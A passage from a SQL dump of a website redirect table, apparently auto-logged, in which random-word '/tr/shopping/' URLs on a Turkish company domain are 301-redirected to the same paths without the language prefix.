00:00:00',301),(79624,'https://3s-technologies.com.tr/tr/shopping/coletit/2348650257.html',NULL,'https://3s-technologies.com.tr/shopping/coletit/2348650257.html','',1,0,'2026-06-11 22:55:22','0000-00-00 00:00:00',301),(79625,'https://3s-technologies.com.tr/tr/shopping/anthracene/1171673689.html',NULL,'https://3s-technologies.com.tr/shopping/anthracene/1171673689.html','',1,0,'2026-06-11 22:55:25','0000-00-00 00:00:00',301),(79626,'https://3s-technologies.com.tr/tr/shopping/subglobose/446811966.html',NULL,'https://3s-technologies.com.tr/shopping/subglobose/446811966.html','',1,0,'2026-06-11 22:55:29','0000-00-00 00:00:00',301),(79627,'https://3s-technologies.com.tr/tr/shopping/birchbark/1153713685.html',NULL,'https://3s-technologies.com.tr/shopping/birchbark/1153713685.html','',1,0,'2026-06-11 22:55:31','0000-00-00 00:00:00',301),(79628,'https://3s-technologies.com.tr/tr/shopping/firewarden/203922053.html',NULL,'https://3s-technologies.com.tr/shopping/firewarden/203922053.html','',1,0,'2026-06-11 22:55:34','0000-00-00 00:00:00',301),(79629,'https://3s-technologies.com.tr/tr/shopping/willughbii/927597747.html',NULL,'https://3s-technologies.com.tr/shopping/willughbii/927597747.html','',1,0,'2026-06-11 22:55:37','0000-00-00 00:00:00',301),(79630,'https://3s-technologies.com.tr/tr/shopping/collaris/980760627.html',NULL,'https://3s-technologies.com.tr/shopping/collaris/980760627.html','',1,0,'2026-06-11 22:55:40','0000-00-00 00:00:00',301),(79631,'https://3s-technologies.com.tr/tr/shopping/outfrown/472130282.html',NULL,'https://3s-technologies.com.tr/shopping/outfrown/472130282.html','',1,0,'2026-06-11 22:55:43','0000-00-00 00:00:00',301),(79632,'https://3s-technologies.com.tr/tr/shopping/brachyptera/445436328.html',NULL,'https://3s-technologies.com.tr/shopping/brachyptera/445436328.html','',1,0,'2026-06-11 22:55:46','0000-00-00 00:00:00',301),(79633,'https://3s-technologies.com.tr/tr/shopping/greenling/2246767295.html',NULL,'https://3s-technologies.com.tr/shopping/greenling/2246767295.html','',1,0,'2026-06-11 22:55:49','0000-00-00 00:00:00',301),(79634,'https://3s-technologies.com.tr/tr/shopping/invoking/2450850400.html',NULL,'https://3s-technologies.com.tr/shopping/invoking/2450850400.html','',1,0,'2026-06-11 22:55:52','0000-00-00 00:00:00',301),(79635,'https://3s-technologies.com.tr/tr/shopping/bioflavinoid/2261861658.html',NULL,'https://3s-technologies.com.tr/shopping/bioflavinoid/2261861658.html','',1,0,'2026-06-11 22:55:55','0000-00-00 00:00:00',301),(79636,'https://3s-technologies.com.tr/tr/shopping/gastroenteritis/546067072.html',NULL,'https://3s-technologies.com.tr/shopping/gastroenteritis/546067072.html','',1,0,'2026-06-11 22:55:58','0000-00-00 00:00:00',301),(79637,'https://3s-technologies.com.tr/tr/shopping/medicinal/3259900352.html',NULL,'https://3s-technologies.com.tr/shopping/medicinal/3259900352.html','',1,0,'2026-06-11 22:56:01','0000-00-00 00:00:00',301),(79638,'https://3s-technologies.com.tr/tr/shopping/callot/1317611306.html',NULL,'https://3s-technologies.com.tr/shopping/callot/1317611306.html','',1,0,'2026-06-11 22:56:04','0000-00-00 00:00:00',301),(79639,'https://3s-technologies.com.tr/tr/shopping/mortise/752916631.html',NULL,'https://3s-technologies.com.tr/shopping/mortise/752916631.html','',1,0,'2026-06-11 22:56:07','0000-00-00 00:00:00',301),(79640,'https://3s-technologies.com.tr/tr/shopping/translavation/1126230779.html',NULL,'https://3s-technologies.com.tr/shopping/translavation/1126230779.html','',1,0,'2026-06-11 22:56:10','0000-00-00 00:00:00',301),(79641,'https://3s-technologies.com.tr/tr/shopping/brucei/3583056129.html',NULL,'https://3s-technologies.com.tr/shopping/brucei/3583056129.html','',1,0,'2026-06-11 22:56:13','0000-00-00 00:00:00',301),(79642,'https://3s-technologies.com.tr/tr/shopping/otologist/2513763425.html',NULL,'https://3s-technologies.com.tr/shopping/otologist/2513763425.html','',1,0,'2026-06-11 22:56:16','0000-00-00 00:00:00',301),(79643,'https://3s-technologies.com.tr/tr/shopping/compendia/3469404406.html',NULL,'https://3s-technologies.com.tr/shopping/compendia/3469404406.html','',1,0,'2026-06-11 22:56:19','0000-00-00 00:00:00',301),(79644,'https://3s-technologies.com.tr/tr/shopping/hydrophasianus/4255711789.html',NULL,'https://3s-technologies.com.tr/shopping/hydrophasianus/4255711789.html','',1,0,'2026-06-11 22:56:22','0000-00-00 00:00:00',301),(79645,'https://3s-technologies.com.tr/tr/shopping/abnegation/4242047141.html',NULL,'https://3s-technologies.com.tr/shopping/abnegation/4242047141.html','',1,0,'2026-06-11 22:56:25','0000-00-00 00:00:00',301),(79646,'https://3s-technologies.com.tr/tr/shopping/nettlebird/3779870648.html',NULL,'https://3s-technologies.com.tr/shopping/nettlebird/3779870648.html','',1,0,'2026-06-11 22:56:28','0000-00-00 00:00:00',301),(79647,'https://3s-technologies.com.tr/tr/shopping/cynodon/1154925784.html',NULL,'https://3s-technologies.com.tr/shopping/cynodon/1154925784.html','',1,0,'2026-06-11 22:56:31','0000-00-00 00:00:00',301),(79648,'https://3s-technologies.com.tr/tr/shopping/indies/236057753.html',NULL,'https://3s-technologies.com.tr/shopping/indies/236057753.html','',1,0,'2026-06-11 22:56:34','0000-00-00 00:00:00',301),(79649,'https://3s-technologies.com.tr/tr/shopping/lupulin/3501965452.html',NULL,'https://3s-technologies.com.tr/shopping/lupulin/3501965452.html','',1,0,'2026-06-11 22:56:37','0000-00-00 00:00:00',301),(79650,'https://3s-technologies.com.tr/tr/shopping/winnower/2458979384.html',NULL,'https://3s-technologies.com.tr/shopping/winnower/2458979384.html','',1,0,'2026-06-11 22:56:40','0000-00-00 00:00:00',301),(79651,'https://3s-technologies.com.tr/tr/shopping/byssiferous/2227329937.html',NULL,'https://3s-technologies.com.tr/shopping/byssiferous/2227329937.html','',1,0,'2026-06-11 22:56:43','0000-00-00 00:00:00',301),(79652,'https://3s-technologies.com.tr/tr/shopping/dankishness/1347291215.html',NULL,'https://3s-technologies.com.tr/shopping/dankishness/1347291215.html','',1,0,'2026-06-11 22:56:46','0000-00-00 00:00:00',301),(79653,'https://3s-technologies.com.tr/tr/shopping/defloration/1388474582.html',NULL,'https://3s-technologies.com.tr/shopping/defloration/1388474582.html','',1,0,'2026-06-11 22:56:49','0000-00-00 00:00:00',301),(79654,'https://3s-technologies.com.tr/tr/shopping/cercis/3407655002.html',NULL,'https://3s-technologies.com.tr/shopping/cercis/3407655002.html','',1,0,'2026-06-11 22:56:52','0000-00-00 00:00:00',301),(79655,'https://3s-technologies.com.tr/tr/shopping/retinaldehyde/3321860870.html',NULL,'https://3s-technologies.com.tr/shopping/retinaldehyde/3321860870.html','',1,0,'2026-06-11 22:56:55','0000-00-00 00:00:00',301),(79656,'https://3s-technologies.com.tr/tr/shopping/weepful/2026177366.html',NULL,'https://3s-technologies.com.tr/shopping/weepful/2026177366.html','',1,0,'2026-06-11 22:56:58','0000-00-00 00:00:00',301),(79657,'https://3s-technologies.com.tr/tr/shopping/nectareal/2908086420.html',NULL,'https://3s-technologies.com.tr/shopping/nectareal/2908086420.html','',1,0,'2026-06-11 22:57:01','0000-00-00 00:00:00',301),(79658,'https://3s-technologies.com.tr/tr/shopping/scapement/4136687957.html',NULL,'https://3s-technologies.com.tr/shopping/scapement/4136687957.html','',1,0,'2026-06-11 22:57:04','0000-00-00 00:00:00',301),(79659,'https://3s-technologies.com.tr/tr/shopping/malacatune/2320662744.html',NULL,'https://3s-technologies.com.tr/shopping/malacatune/2320662744.html','',1,0,'2026-06-11 22:57:07','0000-00-00 00:00:00',301),(79660,'https://3s-technologies.com.tr/tr/shopping/metalloid/4049290992.html',NULL,'https://3s-technologies.com.tr/shopping/metalloid/4049290992.html','',1,0,'2026-06-11 22:57:10','0000-00-00 00:00:00',301),(79661,'https://3s-technologies.com.tr/tr/shopping/solanoid/884706713.html',NULL,'https://3s-technologies.com.tr/shopping/solanoid/884706713.html','',1,0,'2026-06-11 22:57:13','0000-00-00 00:00:00',301),(79662,'https://3s-technologies.com.tr/tr/shopping/firms/498055763.html',NULL,'https://3s-technologies.com.tr/shopping/firms/498055763.html','',1,0,'2026-06-11 22:57:18','0000-00-00 00:00:00',301),(79663,'https://3s-technologies.com.tr/tr/shopping/courgette/4005974612.html',NULL,'https://3s-technologies.com.tr/shopping/courgette/4005974612.html','',1,0,'2026-06-11 22:57:20','0000-00-00 00:00:00',301),(79664,'https://3s-technologies.com.tr/tr/shopping/fortuneless/2559586273.html',NULL,'https://3s-technologies.com.tr/shopping/fortuneless/2559586273.html','',1,0,'2026-06-11 22:57:26','0000-00-00 00:00:00',301),(79665,'https://3s-technologies.com.tr/tr/shopping/testidunata/3593857654.html',NULL,'https://3s-technologies.com.tr/shopping/testidunata/3593857654.html','',1,0,'2026-06-11 22:57:29','0000-00-00 00:00:00',301),(79666,'https://3s-technologies.com.tr/tr/shopping/ovaria/3473144483.html',NULL,'https://3s-technologies.com.tr/shopping/ovaria/3473144483.html','',1,0,'2026-06-11 22:57:32','0000-00-00 00:00:00',301),(79667,'https://3s-technologies.com.tr/tr/shopping/raleigh/2005019467.html',NULL,'https://3s-technologies.com.tr/shopping/raleigh/2005019467.html','',1,0,'2026-06-11 22:57:35','0000-00-00 00:00:00',301),(79668,'https://3s-technologies.com.tr/tr/shopping/justified/1061715942.html',NULL,'https://3s-technologies.com.tr/shopping/justified/1061715942.html','',1,0,'2026-06-11 22:57:38','0000-00-00 00:00:00',301),(79669,'https://3s-technologies.com.tr/tr/shopping/anthemis/3614075799.html',NULL,'https://3s-technologies.com.tr/shopping/anthemis/3614075799.html','',1,0,'2026-06-11 22:57:41','0000-00-00 00:00:00',301),(79670,'https://3s-technologies.com.tr/tr/shopping/stipendiaries/194339408.html',NULL,'https://3s-technologies.com.tr/shopping/stipendiaries/194339408.html','',1,0,'2026-06-11 22:57:44','0000-00-00 00:00:00',301),(79671,'https://3s-technologies.com.tr/tr/shopping/pipal/3626914252.html',NULL,'https://3s-technologies.com.tr/shopping/pipal/3626914252.html','',1,0,'2026-06-11 22:57:47','0000-00-00 00:00:00',301),(79672,'https://3s-technologies.com.tr/tr/shopping/hemstitched/3682610978.html',NULL,'https://3s-technologies.com.tr/shopping/hemstitched/3682610978.html','',1,0,'2026-06-11 22:57:50','0000-00-00 00:00:00',301),(79673,'https://3s-technologies.com.tr/tr/shopping/bismarck/4131183036.html',NULL,'https://3s-technologies.com.tr/shopping/bismarck/4131183036.html','',1,0,'2026-06-11 22:57:53','0000-00-00 00:00:00',301),(79674,'https://3s-technologies.com.tr/tr/shopping/eucheuma/3993522095.html',NULL,'https://3s-technologies.com.tr/shopping/eucheuma/3993522095.html','',1,0,'2026-06-11 22:57:55','0000-00-00 00:00:00',301),(79675,'https://3s-technologies.com.tr/tr/shopping/gaussmeter/3939379362.html',NULL,'https://3s-technologies.com.tr/shopping/gaussmeter/3939379362.html','',1,0,'2026-06-11 22:57:59','0000-00-00 00:00:00',301),(79676,'https://3s-technologies.com.tr/tr/shopping/emblazonment/1103959875.html',NULL,'https://3s-technologies.com.tr/shopping/emblazonment/1103959875.html','',1,0,'2026-06-11 22:58:02','0000-00-00 00:00:00',301),(79677,'https://3s-technologies.com.tr/tr/shopping/pallid/564484015.html',NULL,'https://3s-technologies.com.tr/shopping/pallid/564484015.html','',1,0,'2026-06-11 22:58:05','0000-00-00 00:00:00',301),(79678,'https://3s-technologies.com.tr/tr/shopping/discipled/2522234319.html',NULL,'https://3s-technologies.com.tr/shopping/discipled/2522234319.html','',1,0,'2026-06-11 22:58:08','0000-00-00 00:00:00',301),(79679,'https://3s-technologies.com.tr/tr/shopping/assur/1928587550.html',NULL,'https://3s-technologies.com.tr/shopping/assur/1928587550.html','',1,0,'2026-06-11 22:58:11','0000-00-00 00:00:00',301),(79680,'https://3s-technologies.com.tr/tr/shopping/omnispective/3237004003.html',NULL,'https://3s-technologies.com.tr/shopping/omnispective/3237004003.html','',1,0,'2026-06-11 22:58:15','0000-00-00 00:00:00',301),(79681,'https://3s-technologies.com.tr/tr/shopping/cantar/4225641130.html',NULL,'https://3s-technologies.com.tr/shopping/cantar/4225641130.html','',1,0,'2026-06-11 22:58:18','0000-00-00 00:00:00',301),(79682,'https://3s-technologies.com.tr/tr/shopping/linguae/3870903926.html',NULL,'https://3s-technologies.com.tr/shopping/linguae/3870903926.html','',1,0,'2026-06-11 22:58:21','0000-00-00 00:00:00',301),(79683,'https://3s-technologies.com.tr/tr/shopping/hockday/4103368335.html',NULL,'https://3s-technologies.com.tr/shopping/hockday/4103368335.html','',1,0,'2026-06-11 22:58:24','0000-00-00 00:00:00',301),(79684,'https://3s-technologies.com.tr/tr/shopping/basylous/3719598506.html',NULL,'https://3s-technologies.com.tr/shopping/basylous/3719598506.html','',1,0,'2026-06-11 22:58:27','0000-00-00 00:00:00',301),(79685,'https://3s-technologies.com.tr/tr/shopping/leatheret/367412390.html',NULL,'https://3s-technologies.com.tr/shopping/leatheret/367412390.html','',1,0,'2026-06-11 22:58:30','0000-00-00 00:00:00',301),(79686,'https://3s-technologies.com.tr/tr/shopping/jouster/484582831.html',NULL,'https://3s-technologies.com.tr/shopping/jouster/484582831.html','',1,0,'2026-06-11 22:58:33','0000-00-00 00:00:00',301),(79687,'https://3s-technologies.com.tr/tr/shopping/telegraphese/1365708158.html',NULL,'https://3s-technologies.com.tr/shopping/telegraphese/1365708158.html','',1,0,'2026-06-11 22:58:36','0000-00-00 00:00:00',301),(79688,'https://3s-technologies.com.tr/tr/shopping/humorousness/4068021652.html',NULL,'https://3s-technologies.com.tr/shopping/humorousness/4068021652.html','',1,0,'2026-06-11 22:58:39','0000-00-00 00:00:00',301),(79689,'https://3s-technologies.com.tr/tr/shopping/cichoraceous/30278248.html',NULL,'https://3s-technologies.com.tr/shopping/cichoraceous/30278248.html','',1,0,'2026-06-11 22:58:42','0000-00-00 00:00:00',301),(79690,'https://3s-technologies.com.tr/tr/shopping/avowed/1572169544.html',NULL,'https://3s-technologies.com.tr/shopping/avowed/1572169544.html','',1,0,'2026-06-11 22:58:45','0000-00-00 00:00:00',301),(79691,'https://3s-technologies.com.tr/tr/shopping/hylotheism/618733046.html',NULL,'https://3s-technologies.com.tr/shopping/hylotheism/618733046.html','',1,0,'2026-06-11 22:58:48','0000-00-00 00:00:00',301),(79692,'https://3s-technologies.com.tr/tr/shopping/heteracanth/3207314351.html',NULL,'https://3s-technologies.com.tr/shopping/heteracanth/3207314351.html','',1,0,'2026-06-11 22:58:51','0000-00-00 00:00:00',301),(79693,'https://3s-technologies.com.tr/tr/shopping/unsinew/3781246286.html',NULL,'https://3s-technologies.com.tr/shopping/unsinew/3781246286.html','',1,0,'2026-06-11 22:58:54','0000-00-00 00:00:00',301),(79694,'https://3s-technologies.com.tr/tr/shopping/futurism/3095203972.html',NULL,'https://3s-technologies.com.tr/shopping/futurism/3095203972.html','',1,0,'2026-06-11 22:58:57','0000-00-00 00:00:00',301),(79695,'https://3s-technologies.com.tr/tr/shopping/hydrogenium/638052825.html',NULL,'https://3s-technologies.com.tr/shopping/hydrogenium/638052825.html','',1,0,'2026-06-11 22:59:00','0000-00-00 00:00:00',301),(79696,'https://3s-technologies.com.tr/tr/shopping/prebronchial/743412009.html',NULL,'https://3s-technologies.com.tr/shopping/prebronchial/743412009.html','',1,0,'2026-06-11 22:59:03','0000-00-00 00:00:00',301),(79697,'https://3s-technologies.com.tr/tr/shopping/helming/1335571326.html',NULL,'https://3s-technologies.com.tr/shopping/helming/1335571326.html','',1,0,'2026-06-11 22:59:06','0000-00-00 00:00:00',301),(79698,'https://3s-technologies.com.tr/tr/shopping/daltonism/2952742593.html',NULL,'https://3s-technologies.com.tr/shopping/daltonism/2952742593.html','',1,0,'2026-06-11 22:59:09','0000-00-00 00:00:00',301),(79699,'https://3s-technologies.com.tr/tr/shopping/nictitation/3239168609.html',NULL,'https://3s-technologies.com.tr/shopping/nictitation/3239168609.html','',1,0,'2026-06-11 22:59:12','0000-00-00 00:00:00',301),(79700,'https://3s-technologies.com.tr/tr/shopping/polypomedusae/1799545498.html',NULL,'https://3s-technologies.com.tr/shopping/polypomedusae/1799545498.html','',1,0,'2026-06-11 22:59:15','0000-00-00 00:00:00',301),(79701,'https://3s-technologies.com.tr/tr/shopping/nameless/4110381305.html',NULL,'https://3s-technologies.com.tr/shopping/nameless/4110381305.html','',1,0,'2026-06-11 22:59:18','0000-00-00 00:00:00',301),(79702,'https://3s-technologies.com.tr/tr/shopping/internasal/541771684.html',NULL,'https://3s-technologies.com.tr/shopping/internasal/541771684.html','',1,0,'2026-06-11 22:59:21','0000-00-00 00:00:00',301),(79703,'https://3s-technologies.com.tr/tr/shopping/dendroideum/453300073.html',NULL,'https://3s-technologies.com.tr/shopping/dendroideum/453300073.html','',1,0,'2026-06-11 22:59:24','0000-00-00 00:00:00',301),(79704,'https://3s-technologies.com.tr/tr/shopping/germinant/3558179208.html',NULL,'https://3s-technologies.com.tr/shopping/germinant/3558179208.html','',1,0,'2026-06-11 22:59:27','0000-00-00 00:00:00',301),(79705,'https://3s-technologies.com.tr/tr/shopping/oligospermous/591839243.html',NULL,'https://3s-technologies.com.tr/shopping/oligospermous/591839243.html','',1,0,'2026-06-11 22:59:30','0000-00-00 00:00:00',301),(79706,'https://3s-technologies.com.tr/tr/shopping/lygeum/1124855141.html',NULL,'https://3s-technologies.com.tr/shopping/lygeum/1124855141.html','',1,0,'2026-06-11 22:59:33','0000-00-00 00:00:00',301),(79707,'https://3s-technologies.com.tr/tr/shopping/sempre/2392439641.html',NULL,'https://3s-technologies.com.tr/shopping/sempre/2392439641.html','',1,0,'2026-06-11 22:59:36','0000-00-00 00:00:00',301),(79708,'https://3s-technologies.com.tr/tr/shopping/gurglingly/3439624980.html',NULL,'https://3s-technologies.com.tr/shopping/gurglingly/3439624980.html','',1,0,'2026-06-11 22:59:39','0000-00-00 00:00:00',301),(79709,'https://3s-technologies.com.tr/tr/shopping/clumsily/1050932463.html',NULL,'https://3s-technologies.com.tr/shopping/clumsily/1050932463.html','',1,0,'2026-06-11 22:59:42','0000-00-00 00:00:00',301),(79710,'https://3s-technologies.com.tr/tr/shopping/languaging/1906116797.html',NULL,'https://3s-technologies.com.tr/shopping/languaging/1906116797.html','',1,0,'2026-06-11 22:59:45','0000-00-00 00:00:00',301),(79711,'https://3s-technologies.com.tr/tr/shopping/kobalt/3595822395.html',NULL,'https://3s-technologies.com.tr/shopping/kobalt/3595822395.html','',1,0,'2026-06-11 22:59:48','0000-00-00 00:00:00',301),(79712,'https://3s-technologies.com.tr/tr/shopping/inexhalable/1568560566.html',NULL,'https://3s-technologies.com.tr/shopping/inexhalable/1568560566.html','',1,0,'2026-06-11 22:59:51','0000-00-00 00:00:00',301),(79713,'https://3s-technologies.com.tr/tr/shopping/ingrace/2654159747.html',NULL,'https://3s-technologies.com.tr/shopping/ingrace/2654159747.html','',1,0,'2026-06-11 22:59:57','0000-00-00 00:00:00',301),(79714,'https://3s-technologies.com.tr/tr/shopping/jupiters/1015160466.html',NULL,'https://3s-technologies.com.tr/shopping/jupiters/1015160466.html','',1,0,'2026-06-11 23:00:00','0000-00-00 00:00:00',301),(79715,'https://3s-technologies.com.tr/tr/shopping/filose/2143433018.html',NULL,'https://3s-technologies.com.tr/shopping/filose/2143433018.html','',1,0,'2026-06-11 23:00:03','0000-00-00 00:00:00',301),(79716,'https://3s-technologies.com.tr/tr/shopping/sowter/128028578.html',NULL,'https://3s-technologies.com.tr/shopping/sowter/128028578.html','',1,0,'2026-06-11 23:00:06','0000-00-00 00:00:00',301),(79717,'https://3s-technologies.com.tr/tr/shopping/epilogue/246154028.html',NULL,'https://3s-technologies.com.tr/shopping/epilogue/246154028.html','',1,0,'2026-06-11 23:00:09','0000-00-00 00:00:00',301),(79718,'https://3s-technologies.com.tr/tr/shopping/showroom/3968038025.html',NULL,'https://3s-technologies.com.tr/shopping/showroom/3968038025.html','',1,0,'2026-06-11 23:00:12','0000-00-00 00:00:00',301),(79719,'https://3s-technologies.com.tr/tr/shopping/ratifia/469360742.html',NULL,'https://3s-technologies.com.tr/shopping/ratifia/469360742.html','',1,0,'2026-06-11 23:00:15','0000-00-00 00:00:00',301),(79720,'https://3s-technologies.com.tr/tr/shopping/mantispidae/3745741635.html',NULL,'https://3s-technologies.com.tr/shopping/mantispidae/3745741635.html','',1,0,'2026-06-11 23:00:18','0000-00-00 00:00:00',301),(79721,'https://3s-technologies.com.tr/tr/shopping/scraggiest/3627926470.html',NULL,'https://3s-technologies.com.tr/shopping/scraggiest/3627926470.html','',1,0,'2026-06-11 23:00:21','0000-00-00 00:00:00',301),(79722,'https://3s-technologies.com.tr/tr/shopping/nervosa/2069165707.html',NULL,'https://3s-technologies.com.tr/shopping/nervosa/2069165707.html','',1,0,'2026-06-11 23:00:24','0000-00-00 00:00:00',301),(79723,'https://3s-technologies.com.tr/tr/shopping/reticula/1739235436.html',NULL,'https://3s-technologies.com.tr/shopping/reticula/1739235436.html','',1,0,'2026-06-11 23:00:27','0000-00-00 00:00:00',301),(79724,'https://3s-technologies.com.tr/tr/shopping/refective/3782458385.html',NULL,'https://3s-technologies.com.tr/shopping/refective/3782458385.html','',1,0,'2026-06-11 23:00:30','0000-00-00 00:00:00',301),(79725,'https://3s-technologies.com.tr/tr/shopping/metapeptone/4075885397.html',NULL,'https://3s-technologies.com.tr/shopping/metapeptone/4075885397.html','',1,0,'2026-06-11 23:00:33','0000-00-00 00:00:00',301),(79726,'https://3s-technologies.com.tr/tr/shopping/inimicous/415563351.html',NULL,'https://3s-technologies.com.tr/shopping/inimicous/415563351.html','',1,0,'2026-06-11 23:00:36','0000-00-00 00:00:00',301),(79727,'https://3s-technologies.com.tr/tr/shopping/ellobium/2186382232.html',NULL,'https://3s-technologies.com.tr/shopping/ellobium/2186382232.html','',1,0,'2026-06-11 23:00:39','0000-00-00 00:00:00',301),(79728,'https://3s-technologies.com.tr/tr/shopping/comradeship/1467790170.html',NULL,'https://3s-technologies.com.tr/shopping/comradeship/1467790170.html','',1,0,'2026-06-11 23:00:42','0000-00-00 00:00:00',301),(79729,'https://3s-technologies.com.tr/tr/shopping/culmiferous/4229529234.html',NULL,'https://3s-technologies.com.tr/shopping/culmiferous/4229529234.html','',1,0,'2026-06-11 23:00:45','0000-00-00 00:00:00',301),(79730,'https://3s-technologies.com.tr/tr/shopping/diameters/1914751214.html',NULL,'https://3s-technologies.com.tr/shopping/diameters/1914751214.html','',1,0,'2026-06-11 23:00:48','0000-00-00 00:00:00',301),(79731,'https://3s-technologies.com.tr/tr/shopping/phrenosin/3828871832.html',NULL,'https://3s-technologies.com.tr/shopping/phrenosin/3828871832.html','',1,0,'2026-06-11 23:00:51','0000-00-00 00:00:00',301),(79732,'https://3s-technologies.com.tr/tr/shopping/incuriously/2356008569.html',NULL,'https://3s-technologies.com.tr/shopping/incuriously/2356008569.html','',1,0,'2026-06-11 23:00:54','0000-00-00 00:00:00',301),(79733,'https://3s-technologies.com.tr/tr/shopping/xyloplastic/4043490089.html',NULL,'https://3s-technologies.com.tr/shopping/xyloplastic/4043490089.html','',1,0,'2026-06-11 23:00:57','0000-00-00 00:00:00',301),(79734,'https://3s-technologies.com.tr/tr/shopping/blacken/3599199084.html',NULL,'https://3s-technologies.com.tr/shopping/blacken/3599199084.html','',1,0,'2026-06-11 23:01:00','0000-00-00 00:00:00',301),(79735,'https://3s-technologies.com.tr/tr/shopping/ingratiatory/1260185451.html',NULL,'https://3s-technologies.com.tr/shopping/ingratiatory/1260185451.html','',1,0,'2026-06-11 23:01:03','0000-00-00 00:00:00',301),(79736,'https://3s-technologies.com.tr/tr/shopping/herdgroom/697054024.html',NULL,'https://3s-technologies.com.tr/shopping/herdgroom/697054024.html','',1,0,'2026-06-11 23:01:06','0000-00-00 00:00:00',301),(79737,'https://3s-technologies.com.tr/tr/shopping/untrue/4078402798.html',NULL,'https://3s-technologies.com.tr/shopping/untrue/4078402798.html','',1,0,'2026-06-11 23:01:09','0000-00-00 00:00:00',301),(79738,'https://3s-technologies.com.tr/tr/shopping/waterpot/3924104254.html',NULL,'https://3s-technologies.com.tr/shopping/waterpot/3924104254.html','',1,0,'2026-06-11 23:01:12','0000-00-00 00:00:00',301),(79739,'https://3s-technologies.com.tr/tr/shopping/episcopalian/2079374653.html',NULL,'https://3s-technologies.com.tr/shopping/episcopalian/2079374653.html','',1,0,'2026-06-11 23:01:15','0000-00-00 00:00:00',301),(79740,'https://3s-technologies.com.tr/tr/shopping/perdifoil/373380089.html',NULL,'https://3s-technologies.com.tr/shopping/perdifoil/373380089.html','',1,0,'2026-06-11 23:01:18','0000-00-00 00:00:00',301),(79741,'https://3s-technologies.com.tr/tr/shopping/applecart/1338948015.html',NULL,'https://3s-technologies.com.tr/shopping/applecart/1338948015.html','',1,0,'2026-06-11 23:01:21','0000-00-00 00:00:00',301),(79742,'https://3s-technologies.com.tr/tr/shopping/scintillate/2755742966.html',NULL,'https://3s-technologies.com.tr/shopping/scintillate/2755742966.html','',1,0,'2026-06-11 23:01:24','0000-00-00 00:00:00',301),(79743,'https://3s-technologies.com.tr/tr/shopping/melanoscope/3384595146.html',NULL,'https://3s-technologies.com.tr/shopping/melanoscope/3384595146.html','',1,0,'2026-06-11 23:01:27','0000-00-00 00:00:00',301),(79744,'https://3s-technologies.com.tr/tr/shopping/warrandise/666859443.html',NULL,'https://3s-technologies.com.tr/shopping/warrandise/666859443.html','',1,0,'2026-06-11 23:01:30','0000-00-00 00:00:00',301),(79745,'https://3s-technologies.com.tr/tr/shopping/mendicant/3188874251.html',NULL,'https://3s-technologies.com.tr/shopping/mendicant/3188874251.html','',1,0,'2026-06-11 23:01:34','0000-00-00 00:00:00',301),(79746,'https://3s-technologies.com.tr/tr/shopping/vanward/3317127711.html',NULL,'https://3s-technologies.com.tr/shopping/vanward/3317127711.html','',1,0,'2026-06-11 23:01:36','0000-00-00 00:00:00',301),(79747,'https://3s-technologies.com.tr/tr/shopping/dogtrick/3249413881.html',NULL,'https://3s-technologies.com.tr/shopping/dogtrick/3249413881.html','',1,0,'2026-06-11 23:01:40','0000-00-00 00:00:00',301),(79748,'https://3s-technologies.com.tr/tr/shopping/casualty/2835031192.html',NULL,'https://3s-technologies.com.tr/shopping/casualty/2835031192.html','',1,0,'2026-06-11 23:01:42','0000-00-00 00:00:00',301),(79749,'https://3s-technologies.com.tr/tr/shopping/bibulous/464421751.html',NULL,'https://3s-technologies.com.tr/shopping/bibulous/464421751.html','',1,0,'2026-06-11 23:01:45','0000-00-00 00:00:00',301),(79750,'https://3s-technologies.com.tr/tr/shopping/organicism/2477801284.html',NULL,'https://3s-technologies.com.tr/shopping/organicism/2477801284.html','',1,0,'2026-06-11 23:01:50','0000-00-00 00:00:00',301),(79751,'https://3s-technologies.com.tr/tr/shopping/unsegregated/1701447862.html',NULL,'https://3s-technologies.com.tr/shopping/unsegregated/1701447862.html','',1,0,'2026-06-11 23:01:54','0000-00-00 00:00:00',301),(79752,'https://3s-technologies.com.tr/tr/shopping/villanize/2315669135.html',NULL,'https://3s-technologies.com.tr/shopping/villanize/2315669135.html','',1,0,'2026-06-11 23:01:57','0000-00-00 00:00:00',301),(79753,'https://3s-technologies.com.tr/tr/shopping/lautverschiebungen/2392560525.html',NULL,'https://3s-technologies.com.tr/shopping/lautverschiebungen/2392560525.html','',1,0,'2026-06-11 23:02:01','0000-00-00 00:00:00',301),(79754,'https://3s-technologies.com.tr/tr/shopping/redress/2218327021.html',NULL,'https://3s-technologies.com.tr/shopping/redress/2218327021.html','',1,0,'2026-06-11 23:02:03','0000-00-00 00:00:00',301),(79755,'https://3s-technologies.com.tr/tr/shopping/pentapetalous/3870717262.html',NULL,'https://3s-technologies.com.tr/shopping/pentapetalous/3870717262.html','',1,0,'2026-06-11 23:02:06','0000-00-00 00:00:00',301),(79756,'https://3s-technologies.com.tr/tr/shopping/swaggy/979198325.html',NULL,'https://3s-technologies.com.tr/shopping/swaggy/979198325.html','',1,0,'2026-06-11 23:02:09','0000-00-00 00:00:00',301),(79757,'https://3s-technologies.com.tr/tr/shopping/policying/2926630432.html',NULL,'https://3s-technologies.com.tr/shopping/policying/2926630432.html','',1,0,'2026-06-11 23:02:12','0000-00-00 00:00:00',301),(79758,'https://3s-technologies.com.tr/tr/shopping/semidiapente/2987989086.html',NULL,'https://3s-technologies.com.tr/shopping/semidiapente/2987989086.html','',1,0,'2026-06-11 23:02:15','0000-00-00 00:00:00',301),(79759,'https://3s-technologies.com.tr/tr/shopping/vaulter/3503649930.html',NULL,'https://3s-technologies.com.tr/shopping/vaulter/3503649930.html','',1,0,'2026-06-11 23:02:18','0000-00-00 00:00:00',301),(79760,'https://3s-technologies.com.tr/tr/shopping/atrociousness/1497325692.html',NULL,'https://3s-technologies.com.tr/shopping/atrociousness/1497325692.html','',1,0,'2026-06-11 23:02:21','0000-00-00 00:00:00',301),(79761,'https://3s-technologies.com.tr/tr/shopping/leucoethiops/3195929514.html',NULL,'https://3s-technologies.com.tr/shopping/leucoethiops/3195929514.html','',1,0,'2026-06-11 23:02:24','0000-00-00 00:00:00',301),(79762,'https://3s-technologies.com.tr/tr/shopping/thrasonical/2715185884.html',NULL,'https://3s-technologies.com.tr/shopping/thrasonical/2715185884.html','',1,0,'2026-06-11 23:02:27','0000-00-00 00:00:00',301),(79763,'https://3s-technologies.com.tr/tr/shopping/gyrfalcon/2478959591.html',NULL,'https://3s-technologies.com.tr/shopping/gyrfalcon/2478959591.html','',1,0,'2026-06-11 23:02:31','0000-00-00 